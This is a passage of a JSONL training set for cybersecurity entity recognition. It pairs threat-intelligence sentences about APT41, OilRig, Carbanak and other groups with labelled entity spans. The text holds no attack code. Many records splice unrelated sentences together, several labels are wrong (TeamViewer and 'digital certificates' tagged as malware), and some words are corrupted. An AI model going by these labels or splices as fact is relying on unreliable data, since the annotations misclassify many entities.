techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . APT41 has targeted organizations in 14 countries over seven years , including: France , India , Italy , Japan , Myanmar , the Netherlands , Singapore , South Korea , South Africa , Switzerland , Thailand , Turkey , the United Kingdom , and the United States (Figure 1) . APT41 espionage operations against entities in these countries follow targeting of verticals consistent with Chinese national policy priorities . We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but aACT from direct intellectual property theft . In 2014 , APT41 was observed carrying out espionage campaigns concurrently with financially motivated intrusions , demonstrating that they could balance different objectives simultaneously . Since 2017 , APT41's activities have included a series of supply chain compromises . The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not alACTs correlate with targeted users or organizations . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled 中東呼吸器症候 群(MERS)の予防 , ” which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . APT41 has also used credentials compromised in previous operations . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . Either APT41 is operating outside of state control but still working with other Chinese APT malware actors , tools , and infrastructure on a parttime or contractual basis , or APT41 is a full-time . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . APT41 has used several malware families that have also been used by other Chinese espionage operators , including variants of HIGHNOON , HOMEUNIX , PHOTO , SOGU , and ZXSHELL , among others . HIGHNOON , one of the main code families observed being used by APT41 , was also used by APT17 in 2015 to target semiconductor and chemical manufacturers . HOMEUNIX , another popular backdoor used by APT41 , has been used by at least 14 separate Chinese espionage groups , including APT1 , APT10 , APT17 , APT18 , and APT20 . APT41 has used CROSSWALK.BIN , a kernel driver , to circumvent firewalls and covertly send data . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . At least two of these malware families , HIGHNOON.CLI and GEARSHIFT , have been used by APT17 and another suspected Chinese espionage group . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . In July 2017 , APT41 initiated a TeamViewer session and transferred files that were later deleted . In these instances , APT41 leveraged TeamViewer to transfer malware into the compromised environment , although we do not have direct evidence of APT41 compromising TeamViewer . In May 2018 , APT41 used TeamViewer for initial entry in the compromise of a healthcare company . Notably , APT41 was observed using proof-of-concept exploit code for CVE-2019-3396 within 23 days after the Confluence . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[46, 51]], "THREAT_ACTOR: attacker": [[152, 160]], "TOOL: XML": [[255, 258]], "ORGANIZATION: Kaspersky’s": [[300, 311]], "THREAT_ACTOR: APT-C-09": [[370, 378], [664, 672]], "TOOL: C2": [[404, 406]], "THREAT_ACTOR: Donot": [[492, 497], [686, 691]], "THREAT_ACTOR: Bitter": [[502, 508], [675, 681]], "THREAT_ACTOR: APT41": [[824, 829], [1098, 1103], [1338, 1343], [1516, 1521], [1974, 1979], [2219, 2224], [2430, 2435], [2598, 2603], [2869, 2874], [3072, 3077], [3216, 3221], [3618, 3623], [3841, 3846], [3963, 3968], [4077, 4082], [4388, 4393], [4431, 4436], [4589, 4594], [4641, 4646], [4852, 4857], [5035, 5040], [5336, 5341], [5516, 5521], [5695, 5700], [5811, 5816], [6315, 6320], [6519, 6524], [6982, 6987], [7147, 7152], [7344, 7349], [7703, 7708], [7944, 7949], [8020, 8025], [8189, 8194], [8275, 8280], [8401, 8406], [8609, 8614], [8688, 8693], [8930, 8935], [9074, 9079], [9217, 9222], [9291, 9296], [9583, 9588], [9783, 9788], [10099, 10104], [10589, 10594], [10743, 10748], [10861, 10866], [11029, 11034], [11198, 11203], [11221, 11226], [11601, 11606], [11857, 11862], [11993, 11998], [12119, 12124], [12475, 12480], [12615, 12620], [12721, 12726], [12846, 12851], [12892, 12897], [12986, 12991], [13097, 13102]], "ORGANIZATION: healthcare": [[863, 873], [12955, 12965]], "ORGANIZATION: high-tech": [[876, 885]], "ORGANIZATION: telecommunications sectors": [[892, 918]], "ORGANIZATION: FireEye": [[1035, 1042], [2045, 2052], [10508, 10515]], "ORGANIZATION: video game industry": [[1188, 1207], [1829, 1848], [8096, 8115]], "THREAT_ACTOR: APT41's": [[1800, 1807], [3410, 3417], [9930, 9937], [10460, 10467]], "ORGANIZATION: entities": [[2904, 2912]], "ORGANIZATION: producing motherboards": [[3528, 3550]], "ORGANIZATION: processors": [[3553, 3563]], "ORGANIZATION: server solutions": [[3570, 3586]], "ORGANIZATION: organizations": [[3637, 3650]], "ORGANIZATION: machine-learning": [[3733, 3749]], "ORGANIZATION: autonomous vehicles": [[3752, 3771]], "ORGANIZATION: medical imaging": [[3774, 3789]], "ORGANIZATION: consumer market": [[3800, 3815]], "ORGANIZATION: European conglomerate": [[3858, 3879]], "ORGANIZATION: telecommunications companies": [[4109, 4137]], "ORGANIZATION: telecom companies": [[4238, 4255]], "TOOL: emails": [[4457, 4463], [4732, 4738], [5837, 5843]], "ORGANIZATION: Hong Kong media": [[4467, 4482]], "ORGANIZATION: pro-democracy": [[4605, 4618]], "ORGANIZATION: Japanese media organization": [[4869, 4896]], "ORGANIZATION: medical device companies": [[5059, 5083]], "ORGANIZATION: financially": [[5360, 5371]], "ORGANIZATION: parent company": [[5545, 5559]], "ORGANIZATION: third healthcare": [[5710, 5726]], "ORGANIZATION: cryptocurrency organizations": [[6106, 6134]], "ORGANIZATION: video game targeting": [[6139, 6159]], "MALWARE: XMRig": [[6214, 6219]], "ORGANIZATION: video game sector": [[6346, 6363], [6563, 6580]], "ORGANIZATION: global companies": [[6449, 6465]], "MALWARE: game source code": [[6800, 6816]], "MALWARE: digital certificates": [[6834, 6854], [11271, 11291]], "SYSTEM: Linux": [[7100, 7105], [7738, 7743]], "ORGANIZATION: online multiplayer networks": [[7253, 7280]], "ORGANIZATION: administrators": [[7327, 7341]], "TOOL: Master Boot Record": [[7756, 7774]], "TOOL: (MBR)": [[7775, 7780]], "MALWARE: ROCKBOOT": [[7800, 7808]], "SYSTEM: Windows": [[7814, 7821]], "ORGANIZATION: ROCKBOOT": [[7921, 7929]], "TOOL: VPN": [[8746, 8749]], "ORGANIZATION: service provider": [[8779, 8795]], "ORGANIZATION: payment": [[8813, 8820]], "ORGANIZATION: service": [[8821, 8828]], "MALWARE: TeamViewer": [[8900, 8910], [9834, 9844], [12737, 12747], [12903, 12913]], "MALWARE: variety of TTPs": [[9309, 9324]], "THREAT_ACTOR: Chinese espionage operators": [[9446, 9473]], "ORGANIZATION: Kaspersky": [[9766, 9775]], "ORGANIZATION: video game developers": [[10178, 10199]], "ORGANIZATION: video game-related": [[10477, 10495]], "ORGANIZATION: game development": [[10633, 10649]], "FILEPATH: HIGHNOON": [[11378, 11386]], "THREAT_ACTOR: Winnti": [[11425, 11431]], "MALWARE: HIGHNOON": [[11727, 11735], [11793, 11801]], "MALWARE: HOMEUNIX": [[11738, 11746], [11949, 11957]], "MALWARE: PHOTO": [[11749, 11754]], "MALWARE: SOGU": [[11757, 11761]], "MALWARE: ZXSHELL": [[11768, 11775]], "THREAT_ACTOR: APT17": [[11882, 11887], [12091, 12096], [12421, 12426]], "ORGANIZATION: semiconductor": [[11906, 11919]], "ORGANIZATION: chemical manufacturers": [[11924, 11946]], "MALWARE: backdoor": [[11976, 11984]], "THREAT_ACTOR: groups": [[12057, 12063]], "THREAT_ACTOR: APT1": [[12076, 12080]], "THREAT_ACTOR: APT10": [[12083, 12088]], "THREAT_ACTOR: APT18": [[12099, 12104]], "THREAT_ACTOR: APT20": [[12111, 12116]], "MALWARE: CROSSWALK.BIN": [[12134, 12147]], "MALWARE: CLASSFON": [[12271, 12279]], "MALWARE: HIGHNOON.CLI": [[12374, 12386]], "MALWARE: GEARSHIFT": [[12391, 12400]], "MALWARE: code-signing certificates": [[12501, 12526]], "ORGANIZATION: nongaming organizations": [[12574, 12597]], "ORGANIZATION: company": [[12966, 12973]], "VULNERABILITY: exploit": [[13028, 13035]], "VULNERABILITY: CVE-2019-3396": [[13045, 13058]], "ORGANIZATION: payment services": [[13116, 13132]]}, "info": {"id": "cyberner_stix_train_005710", "source": "cyberner_stix_train"}}
{"text": "If the C2 has already been taken offline the document will still open , but Word will be unable to retrieve the remote template and thus Word will not load a macro .", "spans": {"TOOL: C2": [[7, 9]], "TOOL: Word": [[76, 80], [137, 141]], "TOOL: macro": [[158, 163]]}, "info": {"id": "cyberner_stix_train_005711", "source": "cyberner_stix_train"}}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "ORGANIZATION: banks": [[159, 164], [227, 232]], "ORGANIZATION: banking": [[181, 188]], "MALWARE: Trojan": [[189, 195]], "MALWARE: GozNym": [[196, 202]]}, "info": {"id": "cyberner_stix_train_005712", "source": "cyberner_stix_train"}}
{"text": "We continue to monitor its progress . ] com , which we previously identified in October 2017 to be an OilRig C2 . It can be proc.exe or chrome.exe or winrar.exe . External Server Requests Indicates an attempt to exfiltrate data to an external server .", "spans": {"THREAT_ACTOR: OilRig": [[102, 108]], "FILEPATH: proc.exe": [[124, 132]], "FILEPATH: chrome.exe": [[136, 146]], "FILEPATH: winrar.exe": [[150, 160]]}, "info": {"id": "cyberner_stix_train_005713", "source": "cyberner_stix_train"}}
{"text": "For contacting C & C , the spyware was found to be using free DNS services , as shown in the screenshot below : SpyNote RAT uses an unusual trick to make sure that it remains up and running and that the spying does not stop . Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens .", "spans": {"MALWARE: SpyNote RAT": [[112, 123]], "THREAT_ACTOR: Group-IB’s": [[264, 274]], "THREAT_ACTOR: Silence’s": [[318, 327]], "THREAT_ACTOR: threat groups": [[706, 719]], "THREAT_ACTOR: OilRig": [[730, 736]], "THREAT_ACTOR: CopyKittens": [[741, 752]]}, "info": {"id": "cyberner_stix_train_005714", "source": "cyberner_stix_train"}}
{"text": "In April 2013 , we saw the first sample , which made heavy use of dynamic code loading ( i.e. , fetching executable code from remote sources after the initial app is installed ) . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs . IRONHALO persists by copying itself to the current user ’s Startup folder . We recommend checking the following for potential evidence of compromise : • Child processes of on Exchange Servers , particularly .", "spans": {"THREAT_ACTOR: MUSTANG PANDA": [[180, 193]], "TOOL: PowerShell scripts": [[264, 282]], "TOOL: Microsoft Office documents": [[287, 313]], "MALWARE: IRONHALO": [[361, 369]], "TOOL: Startup": [[420, 427]]}, "info": {"id": "cyberner_stix_train_005715", "source": "cyberner_stix_train"}}
{"text": "The Trojan also hit users from Ukraine , Turkey , Germany , Belarus , Poland , Armenia , Kazakhstan , the US , and other countries . In 2015 , the SecureWorks® Counter Threat Unit™ ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU™ analysis suggests is based in the People's Republic of China ( PRC ) . Outlaw ’s attack routines may not be new , but it still serves as a reminder for enterprises to update their systems regularly . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[147, 180]], "ORGANIZATION: CTU": [[183, 186]], "THREAT_ACTOR: TG-3390": [[263, 270]], "ORGANIZATION: CTU™": [[281, 285]], "THREAT_ACTOR: Outlaw": [[357, 363]], "THREAT_ACTOR: 8BASE": [[533, 538]], "ORGANIZATION: Brazil": [[567, 573]], "THREAT_ACTOR: PLAY": [[609, 613]], "ORGANIZATION: Switzerland": [[625, 636]]}, "info": {"id": "cyberner_stix_train_005716", "source": "cyberner_stix_train"}}
{"text": "Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article .", "spans": {"THREAT_ACTOR: STRONTIUM": [[77, 86]]}, "info": {"id": "cyberner_stix_train_005717", "source": "cyberner_stix_train"}}
{"text": "ABUSE OF ACCESSIBILITY SERVICES EventBot abuses the accessibility services of Android devices for the majority of its activity . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": {"MALWARE: EventBot": [[32, 40]], "SYSTEM: Android": [[78, 85]], "MALWARE: OutExtra.exe": [[129, 141]], "MALWARE: finder.exe": [[198, 208]], "MALWARE: DropIt sample": [[239, 252]], "FILEPATH: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671": [[264, 328]], "FILEPATH: %TEMP%\\flash_update.exe": [[390, 413]], "MALWARE: Flash Player installer": [[438, 460]]}, "info": {"id": "cyberner_stix_train_005718", "source": "cyberner_stix_train"}}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Considering the Trojan delivery method and through our analysis of infections on banks' networks , we can confirm that all infections were conducted on a random basis .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "MALWARE: Trojan": [[102, 108]]}, "info": {"id": "cyberner_stix_train_005719", "source": "cyberner_stix_train"}}
{"text": "The document attached to this e-mail exploits CVE-2012-0158 . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused .", "spans": {"VULNERABILITY: e-mail exploits": [[30, 45]], "VULNERABILITY: CVE-2012-0158": [[46, 59]]}, "info": {"id": "cyberner_stix_train_005720", "source": "cyberner_stix_train"}}
{"text": "This was the C2 for an Android infostealer responsible for several attacks in Italy back in late 2019 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . They move laterally and escalate system privileges to extract sensitive information — whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult .", "spans": {"MALWARE: Android infostealer": [[23, 42]], "MALWARE: China Chopper": [[108, 121]], "VULNERABILITY: CVE-2015-0062": [[250, 263]], "VULNERABILITY: CVE-2015-1701": [[266, 279]], "VULNERABILITY: CVE-2016-0099": [[284, 297]], "THREAT_ACTOR: attacker": [[311, 319], [459, 467]], "MALWARE: RATs": [[501, 505]]}, "info": {"id": "cyberner_stix_train_005721", "source": "cyberner_stix_train"}}
{"text": "The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes .", "spans": {}, "info": {"id": "cyberner_stix_train_005722", "source": "cyberner_stix_train"}}
{"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]], "ORGANIZATION: Pakistani businessmen": [[257, 278]]}, "info": {"id": "cyberner_stix_train_005723", "source": "cyberner_stix_train"}}
{"text": "Previous version The capture service class implements the chat applications interception . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China . The one outlier was written as winword.exe . Acquire Infrastructure : Web Services APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware , such as HAMMERTOSS .", "spans": {"FILEPATH: winword.exe": [[221, 232]], "THREAT_ACTOR: Web Services APT29": [[260, 278]], "SYSTEM: C2": [[354, 356]], "MALWARE: malware": [[360, 367]], "MALWARE: HAMMERTOSS": [[378, 388]]}, "info": {"id": "cyberner_stix_train_005724", "source": "cyberner_stix_train"}}
{"text": "Example of more recent FakeSpy campaigns targeting France . Symantec’s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute .", "spans": {"MALWARE: FakeSpy": [[23, 30]], "ORGANIZATION: Symantec’s": [[60, 70]], "THREAT_ACTOR: Elfin": [[71, 76]], "ORGANIZATION: engineering": [[120, 131]], "ORGANIZATION: chemical": [[134, 142]], "ORGANIZATION: healthcare": [[175, 185]], "THREAT_ACTOR: GCMAN group": [[243, 254]], "ORGANIZATION: bank": [[287, 291]]}, "info": {"id": "cyberner_stix_train_005725", "source": "cyberner_stix_train"}}
{"text": "In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": {"THREAT_ACTOR: attackers": [[29, 38]], "FILEPATH: attachment": [[203, 213]], "MALWARE: Trojan": [[231, 237]], "MALWARE: NetTraveler": [[247, 258]], "FILEPATH: DLL side-loading": [[267, 283]]}, "info": {"id": "cyberner_stix_train_005726", "source": "cyberner_stix_train"}}
{"text": "Translated from Russian , this file is named “ PROJECT_REALIZATION_PLAN.rar ” and contains a compressed .scr executable .", "spans": {"FILEPATH: PROJECT_REALIZATION_PLAN.rar": [[47, 75]], "FILEPATH: .scr": [[104, 108]]}, "info": {"id": "cyberner_stix_train_005727", "source": "cyberner_stix_train"}}
{"text": "Zen family PHA authors exhibit a wide range of techniques , from simply inserting an advertising SDK to a sophisticated trojan . he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Dell SecureWorks Counter Threat Unit ( CTU ) analysts were recently engaged with a client thought to have been compromised by a threat group CTU researchers have named Threat Group-0416 ( TG-0416 ) . The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": {"MALWARE: Zen": [[0, 3]], "THREAT_ACTOR: PassCV": [[132, 138]], "TOOL: publicly available RATs": [[164, 187]], "ORGANIZATION: Dell SecureWorks Counter Threat Unit": [[340, 376]], "ORGANIZATION: CTU": [[379, 382], [481, 484]], "THREAT_ACTOR: Threat Group-0416": [[508, 525]], "THREAT_ACTOR: TG-0416": [[528, 535]]}, "info": {"id": "cyberner_stix_train_005728", "source": "cyberner_stix_train"}}
{"text": "In the summer of 2014 , we noted that certain samples of BlackEnergy malware began targeting Ukranian government organizations for information harvesting . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": {"TOOL: BlackEnergy malware": [[57, 76]], "ORGANIZATION: government organizations": [[102, 126]], "THREAT_ACTOR: APT32": [[166, 171]], "FILEPATH: Vietnam.exe": [[270, 281]], "ORGANIZATION: diaspora": [[341, 349]]}, "info": {"id": "cyberner_stix_train_005729", "source": "cyberner_stix_train"}}
{"text": "Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . The mothership server is generally a VPS , which runs the Control panel software used to interact with the victims .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[51, 58]], "THREAT_ACTOR: espionage": [[76, 85]], "TOOL: VPS": [[195, 198]]}, "info": {"id": "cyberner_stix_train_005730", "source": "cyberner_stix_train"}}
{"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"MALWARE: RIPPER": [[0, 6]], "ORGANIZATION: ATM vendors": [[77, 88]], "ORGANIZATION: Deepen": [[143, 149]], "ORGANIZATION: China and US relations experts": [[238, 268]], "ORGANIZATION: Defense Department": [[271, 289]], "ORGANIZATION: geospatial groups": [[305, 322]], "ORGANIZATION: federal government": [[334, 352]]}, "info": {"id": "cyberner_stix_train_005731", "source": "cyberner_stix_train"}}
{"text": "The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": {"THREAT_ACTOR: threat actor": [[4, 16]], "TOOL: WMI": [[27, 30]], "TOOL: PsExec": [[35, 41]], "ORGANIZATION: military personnel": [[195, 213]], "ORGANIZATION: businessmen": [[218, 229]]}, "info": {"id": "cyberner_stix_train_005732", "source": "cyberner_stix_train"}}
{"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "THREAT_ACTOR: BARIUM": [[105, 111]], "THREAT_ACTOR: APT17": [[155, 160]], "THREAT_ACTOR: Axiom": [[163, 168]], "THREAT_ACTOR: Deputy": [[173, 179]], "THREAT_ACTOR: Dog": [[180, 183]], "MALWARE: ShadowPad": [[215, 224]], "MALWARE: CCleaner": [[229, 237]], "MALWARE: software updates": [[297, 313]]}, "info": {"id": "cyberner_stix_train_005733", "source": "cyberner_stix_train"}}
{"text": "SHA256 15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a .", "spans": {"FILEPATH: 15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a": [[7, 71]]}, "info": {"id": "cyberner_stix_train_005734", "source": "cyberner_stix_train"}}
{"text": "The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . However , despite the similarities to previous Turla campaigns , we believe that WhiteBear is a distinct project with a separate focus .", "spans": {"THREAT_ACTOR: Leafminer": [[4, 13]], "THREAT_ACTOR: operators": [[14, 23]], "VULNERABILITY: EternalBlue": [[28, 39]], "MALWARE: WhiteBear": [[207, 216]]}, "info": {"id": "cyberner_stix_train_005735", "source": "cyberner_stix_train"}}
{"text": "Other samples communicated with other servers listed at the bottom of this report . These incidents involved spear-phishing attacks , which characteristic of HELIX KITTEN , included emails containing malicious PowerShell in their macros that connects to known C2 infrastructure . This campaign shows a threat actor interested in specific Middle Eastern and Arabic-speaking countries . With regards to these similarities , we highlight the following trends which could manifest in future OT malware : •", "spans": {"THREAT_ACTOR: HELIX KITTEN": [[158, 170]], "TOOL: PowerShell": [[210, 220]], "MALWARE: OT malware": [[487, 497]]}, "info": {"id": "cyberner_stix_train_005736", "source": "cyberner_stix_train"}}
{"text": "The origins of MiniDuke can thus be traced back to the origins of GeminiDuke , of which the earliest observed sample was compiled in January of 2009 .", "spans": {"MALWARE: MiniDuke": [[15, 23]], "MALWARE: GeminiDuke": [[66, 76]]}, "info": {"id": "cyberner_stix_train_005737", "source": "cyberner_stix_train"}}
{"text": "RECEIVE_BOOT_COMPLETED - Allows the application to receive a broadcast after the system finishes booting . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": {"ORGANIZATION: banks": [[213, 218]], "TOOL: emails": [[442, 448]]}, "info": {"id": "cyberner_stix_train_005738", "source": "cyberner_stix_train"}}
{"text": "Spread command from C2 The victim receives the command sendSMSMass . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb Loader #2 . We believe this is a different campaign and threat actor altogether .", "spans": {"THREAT_ACTOR: APT10": [[69, 74]], "ORGANIZATION: technology": [[219, 229]], "ORGANIZATION: telecommunications sector": [[234, 259]], "ORGANIZATION: MSPs": [[373, 377]], "THREAT_ACTOR: OceanLotus": [[380, 390]], "FILEPATH: C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb": [[393, 474]], "THREAT_ACTOR: threat actor": [[531, 543]]}, "info": {"id": "cyberner_stix_train_005739", "source": "cyberner_stix_train"}}
{"text": "Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 .", "spans": {"TOOL: HIDDEN COBRA malware": [[43, 63]], "TOOL: Volgmer": [[122, 129]], "FILEPATH: TajMahal": [[162, 170]]}, "info": {"id": "cyberner_stix_train_005740", "source": "cyberner_stix_train"}}
